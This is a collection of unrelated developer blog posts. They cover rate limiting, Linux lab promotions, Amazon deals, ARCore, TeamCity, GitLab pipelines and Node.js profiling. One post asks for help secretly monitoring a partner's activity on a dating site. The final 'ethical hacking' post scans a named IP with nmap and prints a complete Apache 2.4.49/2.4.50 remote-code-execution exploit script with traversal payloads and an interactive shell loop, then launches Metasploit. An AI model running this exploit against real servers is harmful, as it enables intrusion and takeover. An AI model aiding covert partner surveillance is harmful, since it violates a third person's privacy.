follows: ``` boolean isLimitExceeded() { return busy >= limit; } ``` The key lies in how the limit is calculated: ``` this.limit = (int)Math.max(1, Math.ceil(totalLimit * percent)); ``` In this way, based on the percentage we set, less important requests are more likely to trigger the isLimitExceeded() condition, thus being restricted. So the overall logic is that as long as the requests do not exceed the overall limit, **all requests will be allowed**. However, if there is a resource shortage, since we have set the pass rate for important requests to 100% and non-important requests to 0%, **all the requests that pass will be important requests**. In this way, we achieve our goal. ## Summary By understanding Netflix's rate limiting open-source component, we now have the capability to prioritize high-priority requests and restrict low-priority requests within the same instance when resources are tight. This parameter request is very simple. Of course, we can also adjust the parameters to ensure that a small number of low-priority interfaces still provide requests, such as 0.1. Afterward, I will frequently update my interpretations of technical articles from major companies and combine them with practical experience or source code analysis. Please follow me, and thank you.
bochaoli95
1,912,104
Embark on a Linux Adventure: Challenges That Elevate Your Skills 🚀
The article is about an exciting collection of nine Linux-themed challenges that transport readers to captivating virtual realms and push their technical skills to new heights. From discovering one's Linux identity to exploring virtual reality shell environments, the challenges cover a diverse range of topics, including file management, permissions, text editing, shell scripting, and more. Each challenge is designed to immerse readers in a unique narrative, blending problem-solving with engaging storytelling. The article provides a concise overview of the challenges, highlighting their key themes and inviting readers to embark on these Linux adventures to elevate their digital expertise. With links to the individual challenges, the article promises an unforgettable journey of self-discovery, innovation, and mastery within the vast Linux ecosystem.
27,674
2024-07-05T00:42:11
https://dev.to/labex/embark-on-a-linux-adventure-challenges-that-elevate-your-skills-50e9
linux, coding, programming, tutorial
![MindMap](https://internal-api-drive-stream.feishu.cn/space/api/box/stream/download/authcode/?code=ZDI0MzRlOTA3YTFhYTE2OTBlZDc0NDZkYjNhYjMwYzJfY2M1YzQyY2ZjZjdhMGUxNmI5Mzk4MGE3NDFmYmY1YjBfSUQ6NzM4Nzk0NTUzMjI1MTIwOTczMl8xNzIwMTQwMTMwOjE3MjAyMjY1MzBfVjM) Welcome to an exhilarating collection of Linux-themed challenges that will transport you to captivating virtual realms and push your technical prowess to new heights! 🌟 Whether you're a seasoned Linux enthusiast or a curious newcomer, these immersive experiences will guide you through a journey of self-discovery, problem-solving, and digital mastery. ## Discovering Your Linux Identity 👤 Imagine yourself as a cosmic philosopher, standing beneath a starry sky and pondering your place in the vast Linux universe. In this challenge, you'll use the `whoami` command to reveal your true digital identity and uncover the intricacies of the Linux environment. [Dive in and find your cosmic connection!](https://labex.io/labs/271444) ![Skills Graph](https://pub-a9174e0db46b4ca9bcddfa593141f230.r2.dev/discovering-your-linux-identity-271444.jpg) ## Interstellar File Fusion with Linux 🌌 Welcome to Sci-Astra City, a utopian hub of technological innovation where you, as an esteemed interstellar diplomatic envoy, must use your Linux file-joining prowess to piece together fragmented historical archives. Forge harmonious relationships with alien species by decoding and uniting their digital legacies. [Embark on this interstellar file fusion adventure!](https://labex.io/labs/271312) ## Virtual Reality Shell Exploration 🎮 Immerse yourself in a futuristic virtual reality world where creativity and technology collide. As a digital artist, harness the power of the Linux shell to create dynamic and interactive experiences within this captivating realm. [Unlock the secrets of the virtual reality shell!](https://labex.io/labs/271276) ## The Sanctum of Permissions 🕌 In the mythical kingdom of Indraprastha, a sacred temple of knowledge holds ancient secrets. As a chosen one, decipher the cryptic commands and maintain the sanctity of the temple, restoring order to the land. Explore the intricacies of permissions in this Linux challenge. [Unravel the mysteries of the Sanctum!](https://labex.io/labs/271240) ## Enchanting Linux Text Editing Adventure 📜 Immerse yourself in the enchanting Lake of Mystique, where you, a biologist, must document your findings on the unique creatures residing within. Harness the power of the Vim text editor in a Linux environment to streamline your research. [Embark on this captivating text editing quest!](https://labex.io/labs/271428) ## Reverse Number Using Shell Script 🔢 In this challenge, you'll learn how to use command-line arguments, arithmetic operations, and loops in shell script to reverse a given number. Dive into the intricacies of shell scripting and uncover the secrets of number manipulation. [Unlock the power of shell script reversals!](https://labex.io/labs/18291) ## Right Angle Triangle Pattern 🔺 Explore the world of shell script loops and patterns as you create a right-angled triangle using user input. This challenge will deepen your understanding of loop structures and their application in bash scripting. [Construct the perfect triangle with Linux!](https://labex.io/labs/18289) ## Bash Script Lucky Number Checker 🍀 Delve into the world of Bash, a powerful Unix shell and command language. In this challenge, you'll learn how to use the `else if` statement to create a script that checks if a number is lucky. Enhance your Bash scripting skills and unlock new possibilities. [Discover your lucky number with Linux!](https://labex.io/labs/211457) ## Virtual Linux Listing Adventure 💻 Step into a virtual reality game where you, as a VR Experience Designer, challenge players to master the art of content listing on the Linux command line. Navigate the virtual file system and uncover the secrets of digital mastery. [Embark on this virtual Linux listing quest!](https://labex.io/labs/271326) Embrace the thrill of these Linux-powered challenges and elevate your skills to new heights! 🚀 Each experience promises to transport you to captivating virtual realms, where you'll solve problems, explore new technologies, and unlock the true potential of the Linux ecosystem. 🌟 Get ready to embark on an unforgettable adventure! --- ## Want to learn more? - 🌳 Learn the latest [Linux Skill Trees](https://labex.io/skilltrees/linux) - 📖 Read More [Linux Tutorials](https://labex.io/tutorials/category/linux) - 🚀 Practice thousands of programming labs on [LabEx](https://labex.io) Join our [Discord](https://discord.gg/J6k3u69nU6) or tweet us [@WeAreLabEx](https://twitter.com/WeAreLabEx) ! 😄
labby
1,912,102
Can't Miss: Sniping the Best 4th of July Deals for Developers on Amazon
As developers, we know how important it is to stay ahead of the game, especially when it comes to...
0
2024-07-05T00:35:09
https://dev.to/3a5abi/cant-miss-sniping-the-best-4th-of-july-deals-for-developers-on-amazon-26l4
news, devtoys, developer
As developers, we know how important it is to stay ahead of the game, especially when it comes to snagging the best tech deals. This 4th of July, Amazon is offering some unmissable lightning deals on a range of products perfect for enhancing your workspace and boosting your productivity. Check out these curated blog posts to find the top deals on mini computers, monitors, laptops, and accessories. Act fast—these deals are as hot as the summer sun and won’t last long! ![mini pcs](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/i8m1chqbmw1vj2n5smd8.png) ## [1. **Unmissable 4th of July Mini PC Lightning Deals on Amazon**](https://devtoys.io/2024/07/04/unmissable-4th-of-july-mini-pc-lightning-deals-on-amazon/) Upgrade your setup with these incredible deals on mini computers. Perfect for creating a powerful, space-saving workstation. [⚡Read more](https://devtoys.io/2024/07/04/unmissable-4th-of-july-mini-pc-lightning-deals-on-amazon/) --- ![laptops](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/6janxxzq3miqwt36b4w5.png) ## [2. **Incredible 4th of July Laptop Lightning Deals on Amazon**](https://devtoys.io/2024/07/04/incredible-4th-of-july-laptop-lightning-deals-on-amazon/) Discover amazing discounts on high-performance laptops that are ideal for coding, gaming, or everyday use. [⚡Read more](https://devtoys.io/2024/07/04/incredible-4th-of-july-laptop-lightning-deals-on-amazon/) --- ![accessories](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/e8yv5ktl3bjm7i1vt44m.png) ## [3. **Hot 4th of July Accessory Deals You Can't Miss on Amazon**](https://devtoys.io/2024/07/04/hot-4th-of-july-accessory-deals-you-cant-miss-on-amazon/) From SSDs to gaming headsets, find the best deals on peripherals and accessories to complete your tech arsenal. [⚡Read more](https://devtoys.io/2024/07/04/hot-4th-of-july-accessory-deals-you-cant-miss-on-amazon/) --- ![monitors](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/rquzzfnfp2y2xe2jx21s.png) ## [4. **Unbeatable 4th of July Lightning Deals on Amazon for Monitors**](https://devtoys.io/2024/07/04/unbeatable-4th-of-july-lightning-deals-on-amazon-for-monitors/) Elevate your visual experience with top-rated monitors available at unbeatable prices. Perfect for coding, gaming, and entertainment. [⚡Read more](https://devtoys.io/2024/07/04/unbeatable-4th-of-july-lightning-deals-on-amazon-for-monitors/) --- Stay tuned and act quickly to make the most of these fantastic deals. Sniping these offers will ensure you have the best gear to enhance your development workflow and enjoy the ultimate tech experience this summer. Don't miss out—grab these deals before they’re gone!
3a5abi
1,912,058
Air Bird Selling Website and Juice Selling Website
A post by Uzair Rai
0
2024-07-05T00:09:56
https://dev.to/uzair_rai12/air-bird-selling-website-and-juice-selling-website-55p5
wordpress, webdev
uzair_rai12
1,912,103
Developing Augmented Reality Experiences with ARCore
Introduction Augmented Reality (AR) is a technology that allows for the incorporation of...
0
2024-07-05T00:32:53
https://dev.to/kartikmehta8/developing-augmented-reality-experiences-with-arcore-3301
javascript, beginners, programming, tutorial
## Introduction Augmented Reality (AR) is a technology that allows for the incorporation of virtual elements into the user's real-world environment. With the rise of smartphones and tablets, AR has become widely accessible to the masses. One of the most popular platforms for developing AR experiences is ARCore, which is an easy-to-use software development kit (SDK) created by Google. In this article, we will explore the advantages and disadvantages of using ARCore for developing augmented reality experiences. ## Advantages of ARCore 1. **Easy to Use:** ARCore's user-friendly interface makes it easy for developers to create AR experiences without extensive coding knowledge. 2. **Cross-Platform Compatibility:** ARCore is compatible with both Android and iOS devices, making it accessible to a wider audience. 3. **Powerful Tracking Technology:** ARCore utilizes advanced tracking technology to accurately map the user's surroundings, resulting in a more immersive experience. 4. **Support for Various Devices:** ARCore supports a wide range of devices, from high-end smartphones to budget-friendly devices, ensuring that a larger audience can access the AR experience. ## Disadvantages of ARCore 1. **Limited AR Features:** Unlike other AR development platforms, ARCore has limited features, which can restrict the creativity of developers. 2. **Device Compatibility:** ARCore is not compatible with all devices, which can be a limiting factor for users. ## Features of ARCore 1. **Motion Tracking:** ARCore uses the device's camera to track the user's movements, allowing for a more interactive experience. 2. **Environmental Understanding:** ARCore can detect the size, shape, and position of surfaces in the user's environment, making 3D AR objects appear more realistic. 3. **Cloud Anchors:** ARCore's Cloud Anchors feature allows for shared AR experiences between multiple users. ### Example of ARCore in Action ```java // Sample code for basic ARCore setup void createSession() { try { session = new Session(context); } catch (UnavailableException e) { // Handle exceptions } } void configureSession() { Config config = new Config(session); config.setUpdateMode(Config.UpdateMode.LATEST_CAMERA_IMAGE); session.configure(config); } // This function sets up an AR anchor void addAnchor() { Frame frame = session.update(); Point cloudPoint = frame.getHitTest().get(0).getPoint(); Anchor anchor = session.createAnchor(cloudPoint); } ``` This snippet demonstrates basic setup, configuration, and use of anchors in an ARCore application, showcasing how developers can start integrating AR features into their applications. ## Conclusion In conclusion, ARCore is a powerful and user-friendly platform for developing AR experiences. Its compatibility with various devices, easy-to-use interface, and advanced tracking technology make it a popular choice among developers. However, its limited features and device compatibility can be seen as disadvantages. Overall, ARCore is a great tool for those looking to create immersive and interactive augmented reality experiences. With the continuous advancements in technology, we can expect to see even more exciting features from ARCore in the future.
kartikmehta8
1,912,101
# Comparative Analysis of Testing Management Tools: TeamCity
Teacher: Mag. Patrick Cuadros Quiroga Member: Lupaca Mamani, Ronal Daniel ...
0
2024-07-05T00:24:47
https://dev.to/ronal_daniellupacamaman/-comparative-analysis-of-testing-management-tools-teamcity-1a5p
## Teacher: Mag. Patrick Cuadros Quiroga ## Member: Lupaca Mamani, Ronal Daniel ### INTRODUCTION In today’s software development environment, ensuring the quality and functionality of applications is paramount. Continuous Integration (CI) and Continuous Delivery (CD) tools play a crucial role in automating development and deployment processes. TeamCity, developed by JetBrains, is one of the most popular and widely adopted CI/CD tools in the industry. This article will explore TeamCity’s functionalities, showcasing how it can be effectively used for testing management and code comparison. ### BODY #### What is TeamCity? TeamCity is a powerful CI/CD server designed to automate the build, test, and release processes, ensuring the smooth delivery of high-quality software. Since its initial release in 2006, TeamCity has become a favorite among developers for its robust features and user-friendly interface. #### Key Features of TeamCity: 1. **Extensibility**: TeamCity supports a wide range of plugins, allowing integration with various tools and platforms. 2. **Build Pipelines**: It allows defining complex build pipelines, providing flexibility in automating workflows. 3. **Scalability**: TeamCity can handle projects of any size, from small startups to large enterprises. 4. **Comprehensive VCS Integration**: It integrates seamlessly with multiple version control systems, including Git, Subversion, and Mercurial. 5. **Real-time Feedback**: Provides immediate feedback on build status, helping teams to quickly identify and address issues. #### Advantages of TeamCity: 1. **Customizable Build Configurations**: Its build configuration system is highly flexible, supporting various environments and platforms. 2. **Strong Community Support**: A vibrant community provides plugins, updates, and support. 3. **Detailed Reporting**: Offers extensive reporting features that help track the build process and quality metrics. #### Disadvantages of TeamCity: 1. **Resource Intensive**: Requires substantial server resources to run efficiently. 2. **Learning Curve**: May be complex for new users to configure and manage. 3. **Maintenance Overhead**: Requires regular maintenance to manage updates and ensure security. ### Managing Tests with TeamCity TeamCity provides a robust environment for managing automated tests, from execution to result visualization. Here’s how TeamCity can be used effectively in a real-world scenario: 1. **Configuration of Projects and Builds**: - **Creating a Project**: When starting a new project in TeamCity, you can define specific build configurations for different environments, which allows you to tailor your CI/CD pipeline to meet project-specific needs. - **Build Steps**: Add build steps that include running unit, integration, and functional tests. Tools like JUnit, NUnit, or TestNG can be easily integrated into TeamCity's build process. 2. **Integration with Testing Tools**: - **JUnit**: TeamCity can execute JUnit tests as part of your CI/CD pipeline, collecting and presenting results in its interface for easy review. - **Selenium**: Integrate Selenium for automated functional testing. TeamCity can run these tests across various browsers, reporting results in real-time. 3. **Reporting Results**: - **Dashboards and Test Views**: Test results are displayed on detailed dashboards, including graphs and statistics that help visualize the state and quality of the code efficiently. - **Notifications**: Configure notifications in TeamCity to alert developers of test failures, ensuring a quick and proactive response to identified issues. ### Code Comparison in TeamCity Code comparison is essential to maintain software quality and consistency. TeamCity offers advanced functionalities to facilitate this process: 1. **Integration with Version Control Systems (VCS)**: - **Git, Mercurial, Subversion**: TeamCity integrates seamlessly with popular version control systems, allowing code comparison and merging directly from its interface. - **Branching and Merging**: TeamCity supports advanced branching and merging strategies, helping teams manage and review code changes efficiently. This is particularly useful in large projects with multiple developers working in parallel. 2. **Code Inspection**: - **Static Code Analysis**: Integrating static code analysis tools in TeamCity helps identify potential issues in the code before they reach production. This includes error detection, coding best practices, and security issues. - **Pull Requests**: Configure builds to run automatically when a pull request is created, ensuring all proposed changes are validated before merging. TeamCity's code review functionalities allow comparison of changes and ensure quality before final integration. ### Real-World Example Below is a practical example of a TeamCity pipeline for managing tests and performing code comparisons. This pipeline sets up the environment, runs tests, simulates a code review, and archives the results. #### Example Pipeline **Setting Up JDK and Running Unit Tests with JUnit** This pipeline sets up the environment with JDK 17, runs unit tests using JUnit, and archives the test results. 1. **Environment Setup and Unit Tests**: ```groovy project { name = "Example Project" buildType { name = "Build and Test" vcs { root(DslContext.settingsRoot) } steps { script { name = "Setup JDK" scriptContent = """ export JAVA_HOME=/usr/lib/jvm/java-17-openjdk export PATH=$JAVA_HOME/bin:$PATH java -version """ } script { name = "Run Unit Tests" scriptContent = """ ./gradlew test """ } } features { junit { includePattern = "**/build/test-results/test/*.xml" } } } } ``` #### Explanation: Environment Setup: Configures JDK 17 in the TeamCity environment. Running Unit Tests: Executes unit tests using Gradle. Reporting Results: Configures TeamCity to collect and display JUnit test results. Simulating Test Results and Archiving Results: ```groovy project { name = "Example Project" buildType { name = "Build and Test" vcs { root(DslContext.settingsRoot) } steps { script { name = "Setup JDK" scriptContent = """ export JAVA_HOME=/usr/lib/jvm/java-17-openjdk export PATH=$JAVA_HOME/bin:$PATH java -version """ } script { name = "Run Unit Tests" scriptContent = """ ./gradlew test """ } script { name = "Simulate Test Results" scriptContent = """ echo "Test Results: All tests passed!" > test-results.txt tar -czf test-results.tar.gz test-results.txt """ } } artifacts { artifactRules = "test-results.tar.gz" } features { junit { includePattern = "**/build/test-results/test/*.xml" } } } } ``` ####Explanation: Simulating Test Results: Creates a file with the test results and compresses it. Archiving Results: Configures TeamCity to archive the test results. ##CONCLUSION TeamCity is a powerful and versatile tool that not only facilitates continuous integration and delivery but also provides essential functionalities for test management and code comparison. Its ability to integrate with version control systems and testing tools makes it an ideal choice for development teams aiming to maintain high standards of quality and efficiency in their projects.
ronal_daniellupacamaman
1,912,100
GitLab Pipelines: Streamlining Continuous Integration and Continuous Deployment
Introduction In the modern software development landscape, continuous integration (CI) and continuous...
0
2024-07-05T00:23:32
https://dev.to/edward_hernnapazamaman/gitlab-pipelines-streamlining-continuous-integration-and-continuous-deployment-10l7
**Introduction** In the modern software development landscape, continuous integration (CI) and continuous deployment (CD) have become essential practices for maintaining code quality and delivering updates efficiently. GitLab Pipelines, a feature of GitLab CI/CD, offers a powerful and flexible solution for automating these processes. In this article, we will explore the capabilities of GitLab Pipelines. ## What are GitLab Pipelines? GitLab Pipelines are automated workflows defined in a file called `.gitlab-ci.yml` located in the root of a GitLab repository. These pipelines consist of one or more stages, each containing jobs that can run sequentially or in parallel. The primary goal of GitLab Pipelines is to automate the testing, building, and deployment of applications, ensuring that each change to the codebase is verified and ready for production. ## Key Features of GitLab Pipelines **1. Ease of Configuration:** The `.gitlab-ci.yml` file is straightforward to configure, allowing developers to define stages, jobs, and conditions for their execution. **2. Scalability:** GitLab Pipelines can handle large and complex workflows, making them suitable for projects of any size. **3. Integration:** Seamlessly integrates with other GitLab features, such as GitLab Runner, GitLab Registry, and third-party services. **4. Parallel Execution:** Jobs within a stage can run concurrently, reducing the overall time required for pipeline completion. **5. Custom Runners:** Supports custom GitLab Runners, enabling flexible and scalable execution environments. ## Example GitLab Pipeline Configuration ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/p42weq2pj0cbwly1oxcg.png) **Explanation** **Stages:** The pipeline is divided into three stages: build, test, and deploy. **Variables:** Environment variables can be defined globally. **Cache:** The node_modules directory is cached to speed up subsequent pipeline runs. **before_script:** Commands that run before each job, in this case, npm install to install dependencies. **Jobs:** Each stage has a corresponding job with specific scripts to execute. The deploy job runs only when changes are pushed to the master branch. **Conclusion** GitLab Pipelines offer a robust and versatile solution for implementing CI/CD in any software development project. By automating the build, test, and deployment processes, they help ensure code quality and accelerate the delivery of new features. With its ease of configuration, scalability, and integration capabilities, GitLab Pipelines stand out as a top choice for development teams aiming to streamline their workflows and enhance productivity.
edward_hernnapazamaman
1,912,060
Profiling Node.js apps with Chrome DevTools profiler
Profiling refers to analyzing and measuring an application's performance characteristics. Profiling...
0
2024-07-05T00:22:44
https://sevic.dev/notes/profiling-nodejs-chrome-devtools-profiler/
node, chromedevtools, profiling
--- title: Profiling Node.js apps with Chrome DevTools profiler published: true tags: ['node', 'chromedevtools', 'profiling'] canonical_url: https://sevic.dev/notes/profiling-nodejs-chrome-devtools-profiler/ --- Profiling refers to analyzing and measuring an application's performance characteristics. Profiling helps identify performance bottlenecks in a Node.js app, such as CPU-intensive tasks like cryptographic operations, image processing, or complex calculations. This post covers running a profiler for various Node.js apps in Chrome DevTools. ### Prerequisites - Google Chrome installed - Node.js app bootstrapped ### Setup - Run `node --inspect app.js` to start the debugger. - Open `chrome://inspect`, click `Open dedicated DevTools for Node` and then navigate to the Performance tab. Start recording. - Run load testing via [autocannon](https://www.npmjs.com/package/autocannon) package using the following command format `npx autocannon <COMMAND>`. - Stop recording in Chrome DevTools. ### Profiling On `Perfomance` tab in Chrome DevTools open `Bottom-Up` subtab to identify which functions consume the most time. Look for potential performance bottlenecks, such as synchronous functions for hashing (`pbkdf2Sync`) or file system operations (`readFileSync`).
zsevic
1,912,059
Need help with a project
Hi everyone. I am seeking some help on a project that will hopefully in time save my relationship as...
0
2024-07-05T00:12:19
https://dev.to/steven_r_08cc0b16d47dd777/need-help-with-a-project-4pm1
android, beginners, learning
Hi everyone. I am seeking some help on a project that will hopefully in time save my relationship as well as give me a piece of mind to help keep me sane. My partner and I are a gay couple, and we like to have fun from time to time, when we do our thing we use a website, that in turn has a lot of different aspects to it. My need here is, I need a way to potentially monitor his activity through the website, the catch is, you don't have to have a registered profile, in fact most profiles are anon on there, so instead of monitoring his account, I think monitoring the area would be more reasonable, but only receive notification when certain triggers are met. If that makes any sense.... Please someone help me, I dearly love my fiance, but this website is going to ruin our relationship and id rather know them look dumb and clueless if something is going on
steven_r_08cc0b16d47dd777
1,912,055
I have Built E-commerce Website for my Client
![Image...
0
2024-07-05T00:04:35
https://dev.to/uzair_rai12/i-have-built-e-commerce-website-for-my-client-15fp
wordpress, webdev, css
``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/2tmlve3ky337kgllkhht.jpg) ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/vc8llnwpndrbr22u96p8.jpg) ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0ui7w3p73un7sstpj72e.jpg) ```
uzair_rai12
1,912,054
Server side (vulnerability scanning)
Ethical Hacking Visit the github project: https://github.com/samglish/ServerSide ...
0
2024-07-05T00:02:53
https://dev.to/samglish/server-side-vulnerability-scanning-1hf9
server, dirbuster, vulnerability, skipfish
**Ethical Hacking** Visit the github project: [https://github.com/samglish/ServerSide](https://github.com/samglish/ServerSide) ## Tools <hr> * Skipfish * Owasp Disrbuster * Webslayer * Nmap * Nessus ### The first scanner we will use Nmap <hr> to see the services running, launch nmap. ```bash nmap -sV 145.14.145.161 ``` output ``` Starting Nmap 7.91 ( https://nmap.org ) at 2024-07-04 22:50 WAT Nmap scan report for 145.14.145.161 Host is up (0.28s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp? 80/tcp open http awex 443/tcp open ssl/https awex 2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service : ``` You can retrieve the services that are running or go directly to retrieve them from the database. <a href="https://www.exploit-db.com/">https://www.exploit-db.com/</a> <br> Service:`http` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/1ejrwm59s8smoj4sgqqs.png) * Download the python file exploit ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/i87frcny6d1ljklk63ae.png) * Look the python file ```python # Exploit Title: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3) # Date: 11/11/2021 # Exploit Author: Valentin Lobstein # Vendor Homepage: https://apache.org/ # Version: Apache 2.4.49/2.4.50 (CGI enabled) # Tested on: Debian GNU/Linux # CVE : CVE-2021-41773 / CVE-2021-42013 # Credits : Lucas Schnell #!/usr/bin/env python3 #coding: utf-8 import os import re import sys import time import requests from colorama import Fore,Style header = '''\033[1;91m ▄▄▄ ██▓███ ▄▄▄ ▄████▄ ██░ ██ ▓█████ ██▀███ ▄████▄ ▓█████ ▒████▄ ▓██░ ██▒▒████▄ ▒██▀ ▀█ ▓██░ ██▒▓█ ▀ ▓██ ▒ ██▒▒██▀ ▀█ ▓█ ▀ ▒██ ▀█▄ ▓██░ ██▓▒▒██ ▀█▄ ▒▓█ ▄ ▒██▀▀██░▒███ ▓██ ░▄█ ▒▒▓█ ▄ ▒███ ░██▄▄▄▄██ ▒██▄█▓▒ ▒░██▄▄▄▄██ ▒▓▓▄ ▄██▒░▓█ ░██ ▒▓█ ▄ ▒██▀▀█▄ ▒▓▓▄ ▄██▒▒▓█ ▄ ▓█ ▓██▒▒██▒ ░ ░ ▓█ ▓██▒▒ ▓███▀ ░░▓█▒░██▓░▒████▒ ░██▓ ▒██▒▒ ▓███▀ ░░▒████▒ ▒▒ ▓▒█░▒▓▒░ ░ ░ ▒▒ ▓▒█░░ ░▒ ▒ ░ ▒ ░░▒░▒░░ ▒░ ░ ░ ▒▓ ░▒▓░░ ░▒ ▒ ░░░ ▒░ ░ ▒ ▒▒ ░░▒ ░ ▒ ▒▒ ░ ░ ▒ ▒ ░▒░ ░ ░ ░ ░ ░▒ ░ ▒░ ░ ▒ ░ ░ ░ ░ ▒ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ ░ ░ ''' + Style.RESET_ALL if len(sys.argv) < 2 : print( 'Use: python3 file.py ip:port ' ) sys.exit() def end(): print("\t\033[1;91m[!] Bye bye !") time.sleep(0.5) sys.exit(1) def commands(url,command,session): directory = mute_command(url,'pwd') user = mute_command(url,'whoami') hostname = mute_command(url,'hostname') advise = print(Fore.YELLOW + 'Reverse shell is advised (This isn\'t an interactive shell)') command = input(f"{Fore.RED}╭─{Fore.GREEN + user}@{hostname}: {Fore.BLUE + directory}\n{Fore.RED}╰─{Fore.YELLOW}$ {Style.RESET_ALL}") command = f"echo; {command};" req = requests.Request('POST', url=url, data=command) prepare = req.prepare() prepare.url = url response = session.send(prepare, timeout=5) output = response.text print(output) if 'clear' in command: os.system('/usr/bin/clear') print(header) if 'exit' in command: end() def mute_command(url,command): session = requests.Session() req = requests.Request('POST', url=url, data=f"echo; {command}") prepare = req.prepare() prepare.url = url response = session.send(prepare, timeout=5) return response.text.strip() def exploitRCE(payload): s = requests.Session() try: host = sys.argv[1] if 'http' not in host: url = 'http://'+ host + payload else: url = host + payload session = requests.Session() command = "echo; id" req = requests.Request('POST', url=url, data=command) prepare = req.prepare() prepare.url = url response = session.send(prepare, timeout=5) output = response.text if "uid" in output: choice = "Y" print( Fore.GREEN + '\n[!] Target %s is vulnerable !!!' % host) print("[!] Sortie:\n\n" + Fore.YELLOW + output ) choice = input(Fore.CYAN + "[?] Do you want to exploit this RCE ? (Y/n) : ") if choice.lower() in ['','y','yes']: while True: commands(url,command,session) else: end() else : print(Fore.RED + '\nTarget %s isn\'t vulnerable' % host) except KeyboardInterrupt: end() def main(): try: apache2449_payload = '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash' apache2450_payload = '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash' payloads = [apache2449_payload,apache2450_payload] choice = len(payloads) + 1 print(header) print("\033[1;37m[0] Apache 2.4.49 RCE\n[1] Apache 2.4.50 RCE") while choice >= len(payloads) and choice >= 0: choice = int(input('[~] Choice : ')) if choice < len(payloads): exploitRCE(payloads[choice]) except KeyboardInterrupt: print("\n\033[1;91m[!] Bye bye !") time.sleep(0.5) sys.exit(1) if __name__ == '__main__': main() ``` ## Let's to run file ```bash python3 Explot.py ``` Use: `python3 file.py ip:port` ```bash python3 Explot.py 145.14.145.161:80 ``` ## Use metasploit to exploit <hr> run `msfconsole` in your terminal ```bash sudo msfconsole ``` ```bash .:okOOOkdc' 'cdkOOOko:. .xOOOOOOOOOOOOc cOOOOOOOOOOOOx. :OOOOOOOOOOOOOOOk, ,kOOOOOOOOOOOOOOO: 'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO' oOOOOOOOO. .oOOOOoOOOOl. ,OOOOOOOOo dOOOOOOOO. .cOOOOOc. ,OOOOOOOOx lOOOOOOOO. ;d; ,OOOOOOOOl .OOOOOOOO. .; ; ,OOOOOOOO. cOOOOOOO. .OOc. 'oOO. ,OOOOOOOc oOOOOOO. .OOOO. :OOOO. ,OOOOOOo lOOOOO. .OOOO. :OOOO. ,OOOOOl ;OOOO' .OOOO. :OOOO. ;OOOO; .dOOo .OOOOocccxOOOO. xOOd. ,kOl .OOOOOOOOOOOOO. .dOk, :kk;.OOOOOOOOOOOOO.cOk: ;kOOOOOOOOOOOOOOOk: ,xOOOOOOOOOOOx, .lOOOOOOOl. ,dOd, . =[ metasploit v6.3.5-dev ] + -- --=[ 2296 exploits - 1202 auxiliary - 410 post ] + -- --=[ 962 payloads - 45 encoders - 11 nops ] + -- --=[ 9 evasion ] Metasploit tip: Save the current environment with the save command, future console restarts will use this environment again Metasploit Documentation: https://docs.metasploit.com/ msf6 > search exploit ``` ```bash Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/dos/http/cable_haunt_websocket_dos 2020-01-07 normal No "Cablehaunt" Cable Modem WebSocket DoS 1 exploit/windows/ftp/32bitftp_list_reply 2010-10-12 good No 32bit FTP Client Stack Buffer Overflow 2 exploit/windows/tftp/threectftpsvc_long_mode 2006-11-27 great No 3CTftpSvc TFTP Long Mode Buffer Overflow 3 exploit/windows/ftp/3cdaemon_ftp_user 2005-01-04 average Yes 3Com 3CDaemon 2.0 FTP Username Overflow 4 exploit/windows/scada/igss9_misc 2011-03-24 excellent No 7-Technologies IGSS 9 Data Server/Collector Packet Handling Vulnerabilities 5 exploit/windows/scada/igss9_igssdataserver_rename 2011-03-24 normal No 7-Technologies IGSS 9 IGSSdataServer .RMS Rename Buffer Overflow 6 exploit/windows/scada/igss9_igssdataserver_listall 2011-03-24 good No 7-Technologies IGSS IGSSdataServer.exe Stack Buffer Overflow 7 exploit/windows/fileformat/a_pdf_wav_to_mp3 2010-08-17 normal No A-PDF WAV to MP3 v1.0.0 Buffer Overflow 8 auxiliary/scanner/http/a10networks_ax_directory_traversal 2014-01-28 normal No A10 Networks AX Loadbalancer Directory Traversal 9 exploit/windows/ftp/aasync_list_reply 2010-10-12 good No AASync v2.2.1.0 (Win32) Stack Buffer Overflow (LIST) 10 exploit/windows/scada/abb_wserver_exec 2013-04-05 excellent Yes ABB MicroSCADA wserver.exe Remote Code Execution 11 exploit/windows/fileformat/abbs_amp_lst 2013-06-30 normal No ABBS Audio Media Player .LST Buffer Overflow 12 exploit/linux/local/abrt_raceabrt_priv_esc 2015-04-14 excellent Yes ABRT raceabrt Privilege Escalation 13 exploit/linux/local/abrt_sosreport_priv_esc 2015-11-23 excellent Yes ABRT sosreport Privilege Escalation 14 exploit/windows/fileformat/acdsee_fotoslate_string 2011-09-12 good No ACDSee FotoSlate PLP File id Parameter Overflow 15 exploit/windows/fileformat/acdsee_xpm 2007-11-23 good No ACDSee XPM File Section Buffer Overflow 16 exploit/linux/local/af_packet_chocobo_root_priv_esc 2016-08-12 good Yes AF_PACKET chocobo_root Privilege Escalation 17 exploit/linux/local/af_packet_packet_set_ring_priv_esc 2017-03-29 good Yes AF_PACKET packet_set_ring Privilege Escalation 18 exploit/windows/sip/aim_triton_cseq 2006-07-10 great No AIM Triton 1.0.4 CSeq Buffer Overflow 19 exploit/windows/misc/ais_esel_server_rce 2019-03-27 excellent Yes AIS logistics ESEL-Server Unauth SQL Injection RCE 20 exploit/aix/rpc_cmsd_opcode21 2009-10-07 great No AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 